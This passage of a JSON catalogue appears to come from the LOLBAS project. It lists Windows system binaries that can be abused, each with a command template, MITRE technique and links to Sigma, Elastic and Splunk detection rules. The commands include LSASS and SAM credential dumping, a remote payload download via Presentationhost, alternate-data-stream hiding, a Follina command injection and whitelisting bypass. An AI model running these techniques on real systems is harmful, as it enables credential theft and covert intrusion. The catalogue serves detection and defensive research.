Assistant.","usecase":"Proxy execution of remote dll file","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcalua-exe:2","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java","description":"Open the target .CPL file with the Program Compatibility Assistant.","usecase":"Execution of CPL files","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcwrun-exe:0","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe {PATH_ABSOLUTE:.exe}","description":"Open the target .EXE file with the Program Compatibility Wizard.","usecase":"Proxy execution of binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pcwrun-exe:1","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe /../../$(calc).exe","description":"Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pktmon-exe:0","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe start --etw","description":"Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop","usecase":"use this a built in network sniffer on windows 10 to capture senstive traffic","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pktmon-exe:1","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe filter add -p 445","description":"Select Desired ports for packet capture","usecase":"Look for interesting traffic such as telent or FTP","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pnputil-exe:0","toolId":"lolbas:pnputil-exe","toolName":"Pnputil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pnputil.exe -i -a {PATH_ABSOLUTE:.inf}","description":"Used for installing drivers","usecase":"Add malicious driver","mitre":["T1547"],"privilege":"admin","fullPath":["C:\\Windows\\system32\\pnputil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:presentationhost-exe:0","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Presentationhost.exe {PATH_ABSOLUTE:.xbap}","description":"Executes the target XAML Browser Application (XBAP) file","usecase":"Execute code within XBAP files","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:presentationhost-exe:1","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Presentationhost.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:print-exe:0","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}","description":"Copy file.exe into the Alternate Data Stream (ADS) of file.txt.","usecase":"Hide binary file in alternate data stream to potentially bypass defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:print-exe:1","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}","description":"Copy file from source to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:print-exe:2","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}","description":"Copy File.exe from a network share to the target c:\\OutFolder\\outfile.exe.","usecase":"Copy/Download file from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:printbrm-exe:0","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}","description":"Create a ZIP file from a folder in a remote drive","usecase":"Exfiltrate the contents of a remote folder on a UNC share into a zip file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:printbrm-exe:1","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}","description":"Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder","usecase":"Decompress and extract a ZIP file stored on an alternate data stream to a new folder","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:provlaunch-exe:0","toolId":"lolbas:provlaunch-exe","toolName":"Provlaunch.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"provlaunch.exe LOLBin","description":"Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.","usecase":"Executes arbitrary command","mitre":["T1218"],"privilege":"admin","fullPath":["c:\\windows\\system32\\provlaunch.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml"},{"type":"IOC","value":"c:\\windows\\system32\\provlaunch.exe executions"},{"type":"IOC","value":"Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys"}],"references":["https://twitter.com/0gtweet/status/1674399582162153472","https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:psr-exe:0","toolId":"lolbas:psr-exe","toolName":"Psr.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0","description":"Record a user screen without creating a GUI. You should use \"psr.exe /stop\" to stop recording and create output file.","usecase":"Can be used to take screenshots of the user environment","mitre":["T1113"],"privilege":"user","fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"},{"type":"IOC","value":"psr.exe spawned"},{"type":"IOC","value":"suspicious activity when running with \"/gui 0\" flag"}],"references":["https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx","https://lolbas-project.github.io/lolbas/Binaries/Psr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:query-exe:0","toolId":"lolbas:query-exe","toolName":"Query.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"query.exe user","description":"Once executed, `query.exe` will execute `quser.exe` in the same folder. Thus, if `query.exe` is copied to a folder and an arbitrary executable is renamed to `quser.exe`, `query.exe` will spawn it. Instead of `user`, it is also possible to use `session`, `termsession` or `process` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"query.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rasautou-exe:0","toolId":"lolbas:rasautou-exe","toolName":"Rasautou.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rasautou -d {PATH:.dll} -p export_name -a a -e e","description":"Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.","usecase":"Execute DLL code","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\rasautou.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml"},{"type":"IOC","value":"rasautou.exe command line containing -d and -p"}],"references":["https://github.com/fireeye/DueDLLigence","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rdrleakdiag-exe:0","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump process by PID.","mitre":["T1003"],"privilege":"user","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rdrleakdiag-exe:1","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1","description":"Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rdrleakdiag-exe:2","toolId":"lolbas:rdrleakdiag-exe","toolName":"rdrleakdiag.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap","description":"After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).","usecase":"Dump LSASS process mutliple times.","mitre":["T1003.001"],"privilege":"admin","fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"type":"Elastic","value":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/0gtweet/status/1299071304805560321?s=21","https://www.pureid.io/dumping-abusing-windows-credentials-part-1/","https://github.com/LOLBAS-Project/LOLBAS/issues/84","https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:reg-exe:0","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"reg export HKLM\\SOFTWARE\\Microsoft\\Evilreg {PATH_ABSOLUTE}:evilreg.reg","description":"Export the target Registry key and save it to the specified .REG file within an Alternate data stream.","usecase":"Hide/plant registry information in Alternate data stream for later use","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:reg-exe:1","toolId":"lolbas:reg-exe","toolName":"Reg.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"reg save HKLM\\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\\SAM {PATH_ABSOLUTE:.3.bak}","description":"Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material","usecase":"Dump credentials from the Security Account Manager (SAM)","mitre":["T1003.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"type":"IOC","value":"reg.exe writing to an ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://pure.security/dumping-windows-credentials/","https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regasm-exe:0","toolId":"lolbas:regasm-exe","toolName":"Regasm.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regasm.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute code and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 